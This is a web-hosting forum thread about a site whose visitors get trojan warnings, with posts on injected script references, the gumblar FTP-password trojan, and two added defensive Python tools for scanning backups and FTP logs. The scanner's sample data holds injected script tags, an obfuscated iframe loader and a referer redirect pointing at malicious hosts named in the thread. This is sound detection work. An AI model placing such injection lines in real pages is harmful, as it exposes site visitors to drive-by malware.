Potential Site Trojan


Hey guys,

I don't often like posting questions in here, I usually just go straight to the helpdesk if it is something I cannot work out for myself, but something has me baffled at the minute and I just wanted some advice/ideas from you.

Recently (apparently since the reseller server I am hosted with had the Apache upgrade) people on my site have been complaining that every day they are getting connection issues with the site: pages timing out in IE and Firefox and refusing to load. This is odd to me because even though there are 10 or so regular users at my site complaining of this, there are just as many who are saying they are facing no problems, including myself. I rarely have issues connecting to the site, and I even have people talking to me on MSN saying "Is the site down? I cannot access it", but it isn't down for me. So I have explained that if there are people who can access it then the site isn't down and there must be an issue somewhere else: possibly ISP DNS servers, possibly en route to my domain host; to be honest it could be loads of things. But the fact that they say it is ONLY my site they get this issue with, and that it's not just a one-off case as there are various people who are getting it, makes me think maybe there could be something at this end. I don't really know. Have you guys got any ideas what it could be?

As for the title of this thread, some of the people who are getting the connection issues are also getting warnings from their antivirus software of a potential trojan on my forum. I have downloaded a home directory backup and scanned it with ESET NOD32, Ad-Aware and Spybot S&D and nothing comes up, so I don't know what to do. I get no warnings when trying to load the page myself either. What is the best way to test if a site has this sort of thing?

Thanks in advance,

OJB

OK, one thing I would do is open a ticket with the help desk and have them give it a once-over for the trojan warning. The other thing I would do is ask those users having problems accessing your site if they are on the Road Runner network. I'm on Road Runner and I was having all kinds of issues accessing sites that I knew were up because I could access them from work, where we have AT&T. I have switched my DNS to use OpenDNS instead of Road Runner's DNS servers and haven't had an issue since.

Thanks for the help, Bruce.

I have advised those who are having connection issues to try using OpenDNS, and also, the next time they get any issues, to do a traceroute so I can see if there are any issues with the routing.

As for the trojan warning, the weird thing is... if I download the home directory backup with ESET NOD32 enabled, it will stop the transfer due to a potential HTML/Phishing.gen trojan, but if I disable the antivirus whilst I download, then re-enable it and scan the file, it comes up clean.

I asked the help desk to give the account a once-over but they said they don't/can't do scans on the Linux systems and the files are my responsibility. Which is true and fair enough. So now I am a bit confused as to my next step...

My experience is that not all antivirus programs find everything, so I would scan it with a second antivirus program, just to make sure.

Kaspersky has an online virus scanner you can try (kaspersky.com/virusscanner). There are other online scanners from other companies as well (Google for them); I just happen to like Kaspersky. Or you can download the free ClamWin and try that.

Apart from that I would scan it with Malwarebytes Anti-Malware (malwarebytes.org/mbam.php) and Spybot Search & Destroy (safer-networking.org/index2.html).

Not sure if these two can scan a single folder like an unzipped home directory, but on the other hand it's nice to know that the computer is clean in general if there is no single-folder option.

I googled HTML/Phishing.gen. It sounds like it may be an attachment in an email, so make sure to check all the mailboxes, every single folder in the mail.

Here's a couple of links talking about this...

sunbeltsecurity.com/ThreatDisplay.aspx?name=HTML.Phishing.Gen&tid=44381&cs=D409A08579AF582F869A1741F2FF8F83

eset.com/threat-center/encyclopedia/threats/htmlphishinggen

If this helps you in some way, OJB, we are also experiencing (from Spain) intermittent, short (1-5 minute) connectivity issues to our server (Palpatine) over the last few weeks. It seems to be some kind of communications issue, probably at the datacenter, since it appears to happen only when accessing TCH, sometimes including access to the help desk, forums, or the TCH website itself.

Regarding potential trojans on your forums: one month ago we found that several of our customers' forums and pages had been rewritten by someone on the server, before the body HTML tag, invoking an external script on a Chinese domain, something like rtbn2.cn, and it caused some antiviruses to warn about the risk when downloading the mysteriously modified pages.

I hope this may help you in some way!

Hey guys

Wanted to chime in here.

The past two weeks have been awful from a TCH operational viewpoint. First we had the large DDoS attack against our network that lasted for several days. This was mitigated, and the client that was the star of the DDoS attack left TCH and went to another host. This attack resulted in many blips over the network. This has been corrected and the attack is since over.

This past Friday we once again started to see some network issues. There was a routing issue for several inbound routes over XO and Level 3. This was finally diagnosed and corrected late in the day on Friday. However, this once again resulted in blips across the network.

I am hoping we are past all these issues, and we can run into another 2-3 year run of solid 99.99+% uptime.

I hope this explains some of the issues everyone has been facing.

If you have any questions please feel free to let me know.

Thanks a lot for your post, Bill.

Open and clear communication helps a lot to understand ongoing events and, even more important, to build trust.

Unfortunately, nobody can nowadays ensure something will not fail and, therefore, the most realistic expectation is to work hard together to fix issues when they arise.

We all expect, as you say, many years of smooth and quiet operations!

Kind regards,

We have been with TCH for a long time, and this is the first time a serious issue has affected us.

We have 2 servers with TCH, and this morning I noticed a worrying, apparent breach. On both servers, an index.html file was compromised and references to a rogue site added. The exact addition was '..thebettings.cn:8080/ts/in.cgi?pepsi54..' (This URL is referred to on a malware registration site.)

We are checking to make sure this didn't originate from here, and so far, all the indications are that these files were somehow added in situ on the server.

Has anyone else seen this problem? Thanks

Your FTP password was compromised. We have replied to your help desk ticket showing you the FTP logins.

I will work with you through the help desk ticket and provide you more details.

The server is secure; this was an account-level compromise.

Open and clear communication helps a lot to understand undergoing events and, even more important, to build trust.

I also greatly appreciate the quick and open communication. Coming to the forum and seeing the explanation allowed me to realize that a) TCH was aware of the issues and was working on it, b) I didn't have to spend an entire day investigating all the possible causes myself, c) I didn't need to file a support ticket. I was saved all the worry and a lot of time, and knew the DDoS would eventually pass, and the helpdesk was saved at least one unnecessary "Are you aware of these issues" inquiry. Considering the severity of the attack, the disruption was remarkably well mitigated. In addition, the technical details provided were educational and interesting.

:D

I have switched my DNS to use OpenDNS instead of Road Runner's DNS servers and haven't had an issue since.

By switching to OpenDNS about a year ago, I may have resolved some strange recurring IE7 freeze-ups, although it was only one of a number of solutions I tried in combinations, so I was never completely sure what the cure was.

At one point I tried using my ISP's DNS server as the primary and OpenDNS as the secondary to serve as backup, but for some reason that didn't work well, so I just switched them both to OpenDNS.

some of the people who are getting the connection issues are also getting warnings from their antivirus software of a potential trojan on my forum. I have downloaded a home directory backup and scanned it with Eset NOD32, AdAware and Spybot S&D and nothing comes up, so I don't know what to do. I get no warnings when trying to load the page myself either. What is the best way to test if a site has this sort of thing.

You might be past this issue by now, but some potentially useful info:

I don't think a home directory backup includes the MySQL database, so if the malware is there (such as in the body of a forum post), all your files will test clean.

If the malware is referenced in an iframe or fetched by JavaScript from a remote site, your files will likewise test clean because the malware is only referenced in the page code. The actual malware is fetched by the visitor's browser after your server has sent the page to them.

Check your .htaccess for malicious redirects. Sometimes code is added that redirects visitors to a malicious page only if the referer shows that they came from Google or Yahoo search results. If you go to the site directly, as most owners would do, you get a clean page.

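An added example, written for this page and not code from any poster in the thread: a static scan of a downloaded backup for the hiding places SteveW lists (off-site script and iframe references, content held in the forum database rather than in files, referer-conditioned redirects in .htaccess) and for the kind of injected reference the other posters saw (a script tag inserted before the body tag pointing at rtbn2.cn, or at thebettings.cn:8080/ts/in.cgi?pepsi54). The OWN_HOSTS set, the detection patterns and the sample documents are constructed assumptions; scan_html can be run over a mysqldump text file as well, which covers the database case.

```python
"""Added example (not code from this thread): a static scan of a downloaded
site backup for the injection patterns the posters describe.  OWN_HOSTS, the
detection patterns and the sample documents are assumptions for the example."""
import os
import re
from urllib.parse import urlparse

OWN_HOSTS = {"example.com", "www.example.com"}  # assumption: the site's own hosts

# script/iframe/embed/object tags whose src points somewhere
SRC_RE = re.compile(
    r'<(script|iframe|embed|object)\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
# zero-size or hidden iframes: the usual drive-by container
HIDDEN_IFRAME_RE = re.compile(
    r'<iframe\b[^>]*(width\s*=\s*["\']?0|height\s*=\s*["\']?0'
    r'|display\s*:\s*none|visibility\s*:\s*hidden)', re.I)
# obfuscation idioms used by injected JavaScript
OBFUSC_RE = re.compile(
    r'(document\.write\s*\(\s*unescape|eval\s*\(\s*unescape|String\.fromCharCode)',
    re.I)
# .htaccess: a RewriteCond on the referer followed by a rewrite to another host
REFERER_COND_RE = re.compile(r'RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)', re.I)
REWRITE_RULE_RE = re.compile(r'RewriteRule\s+\S+\s+(https?://[^\s\[]+)', re.I)


def external_host(url):
    """Hostname of url if it is off-site, else None (relative URLs are on-site)."""
    host = urlparse(url).hostname
    if host and host.lower() not in OWN_HOSTS:
        return host.lower()
    return None


def scan_html(text):
    """Findings for one HTML/PHP/JS document, or for a mysqldump of the forum
    database (the patterns are the same; only the container differs)."""
    findings = []
    for tag, url in SRC_RE.findall(text):
        host = external_host(url)
        if host:
            findings.append(("external-" + tag.lower(), host))
    if HIDDEN_IFRAME_RE.search(text):
        findings.append(("hidden-iframe", ""))
    for m in OBFUSC_RE.finditer(text):
        findings.append(("obfuscated-js", m.group(1)))
    return findings


def scan_htaccess(text):
    """Flag a referer-conditioned redirect to a host that is not ours."""
    findings, conds = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = REFERER_COND_RE.match(line)
        if m:
            conds.append(m.group(1))
            continue
        m = REWRITE_RULE_RE.match(line)
        if m:
            host = external_host(m.group(1))
            if conds and host:
                findings.append(("referer-redirect", "|".join(conds) + " -> " + host))
            conds = []  # conditions only apply to the next RewriteRule
    return findings


def scan_tree(root):
    """Walk an unpacked home-directory backup; map relative path -> findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            hits = scan_htaccess(text) if name == ".htaccess" else scan_html(text)
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report


# Constructed samples, using the hosts named in the thread.
INJECTED_INDEX = """<html><head><title>Forum</title>
<script src="/js/forum.js"></script>
<script src="http://thebettings.cn:8080/ts/in.cgi?pepsi54"></script>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//rtbn2.cn/x.php%22%3E'))</script>
</head>
<iframe src="http://rtbn2.cn/x.php" width="0" height="0"></iframe>
<body>forum content</body></html>"""
CLEAN_INDEX = '<html><head><script src="/js/forum.js"></script></head><body>ok</body></html>'
INJECTED_HTACCESS = """RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|yahoo)\\. [NC]
RewriteRule .* http://thebettings.cn:8080/ts/in.cgi?pepsi54 [R,L]
"""

if __name__ == "__main__":
    print(scan_html(INJECTED_INDEX))
    print(scan_htaccess(INJECTED_HTACCESS))
```

Run scan_tree against the unpacked backup directory, and separately scan_html against a mysqldump of the forum database, since a file-only scan never sees post bodies. A hit only tells you a reference to another host is present; whether that host serves malware has to be checked from a machine you do not mind infecting, or not at all.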
Your FTP password was compromised.

There is an exploit called "gumblar" (aka "martuz") now at epidemic levels. It's a password-stealing Trojan that infects a user's PC, gathers up FTP logins, and sends them to remote locations from which they are used to hack websites.

This attack method has been around for a while, but it wasn't very common compared to the levels of RFI and SQL injection attacks, so best security practices could focus primarily on server security measures such as using strong passwords and preventing RFI and SQL injection.

That's changing. Securing your PC with good AV software is now more important than ever for maintaining good website security. A virus on your PC can indeed cause your website to get hacked, and in this case they steal the passwords, which is equally easy whether the passwords are strong or not.

Edited by SteveW
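As an added example, not SteveW's or TCH's code, of what "showing you the FTP logins" looks like in practice once a password has been stolen the way SteveW describes: a triage of xferlog-format transfer log lines (the transfer log written by proftpd, pure-ftpd and vsftpd). The log entries, the KNOWN_IPS allowlist and the file-name pattern are constructed assumptions for this example; the point is that a stolen credential shows up as one account used from several addresses, with uploads to the files the injection needs.

```python
"""Added example (not from this thread): triage an xferlog after a suspected
FTP credential theft.  Log lines, KNOWN_IPS and WEB_FILE_RE are constructed
assumptions about the site in question."""
import re
from collections import defaultdict

# Addresses the site owner actually uploads from (assumption).
KNOWN_IPS = {"198.51.100.10"}
# Files an attacker edits to plant a remote script or iframe reference.
WEB_FILE_RE = re.compile(r'(\.html?|\.php|\.js|\.htaccess)$', re.I)

# Constructed xferlog lines: legitimate uploads from the owner's address, then
# a download-and-reupload of index.html and forum/index.php from an unknown one.
XFERLOG = """\
Mon Jun  8 21:04:12 2009 1 198.51.100.10 5120 /home/ojb/public_html/style.css b _ i r ojb ftp 0 * c
Tue Jun  9 03:11:58 2009 1 203.0.113.7 812 /home/ojb/public_html/index.html a _ o r ojb ftp 0 * c
Tue Jun  9 03:12:03 2009 1 203.0.113.7 1207 /home/ojb/public_html/index.html a _ i r ojb ftp 0 * c
Tue Jun  9 03:12:04 2009 1 203.0.113.7 1193 /home/ojb/public_html/forum/index.php a _ i r ojb ftp 0 * c
Wed Jun 10 14:30:00 2009 2 198.51.100.10 40960 /home/ojb/public_html/images/logo.png b _ i r ojb ftp 0 * c
"""


def parse_xferlog(text):
    """Yield one dict per xferlog line.  Field layout: 5 timestamp fields,
    transfer-time, remote-host, size, filename, type, special, direction,
    access-mode, user, service, auth, uid, completion.  Filenames that
    contain spaces are not handled by this simple split."""
    for line in text.splitlines():
        f = line.split()
        if len(f) < 18:
            continue
        yield {
            "time": " ".join(f[0:5]),
            "ip": f[6],
            "path": f[8],
            "direction": f[11],   # 'i' = upload to server, 'o' = download
            "user": f[13],
            "ok": f[17] == "c",   # 'c' = completed transfer
        }


def triage(text, known_ips=KNOWN_IPS):
    """Return (suspicious_uploads, ips_by_user).

    An upload is suspicious when it completed, touched a web-executable file
    and came from an address we do not recognise.  The per-user IP map shows
    one account used from several places, which points at a stolen password
    rather than a server-side break-in."""
    ips_by_user = defaultdict(set)
    suspicious = []
    for rec in parse_xferlog(text):
        ips_by_user[rec["user"]].add(rec["ip"])
        if (rec["direction"] == "i" and rec["ok"]
                and rec["ip"] not in known_ips
                and WEB_FILE_RE.search(rec["path"])):
            suspicious.append((rec["time"], rec["user"], rec["ip"], rec["path"]))
    return suspicious, dict(ips_by_user)


def affected_paths(text, known_ips=KNOWN_IPS):
    """Sorted unique paths to restore from a backup that predates the first hit."""
    suspicious, _ = triage(text, known_ips)
    return sorted({p for _, _, _, p in suspicious})


if __name__ == "__main__":
    hits, ips = triage(XFERLOG)
    for t, user, ip, path in hits:
        print(f"{t}  {user}@{ip} uploaded {path}")
    for user, addrs in ips.items():
        print(f"{user}: used from {', '.join(sorted(addrs))}")
```

The log shows where the account was used, not how the password left your PC, so the fix is in the order SteveW implies: clean the PC (or use one you trust), change the FTP password from that machine, then restore the files listed by affected_paths from a backup older than the earliest suspicious upload and re-check them.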
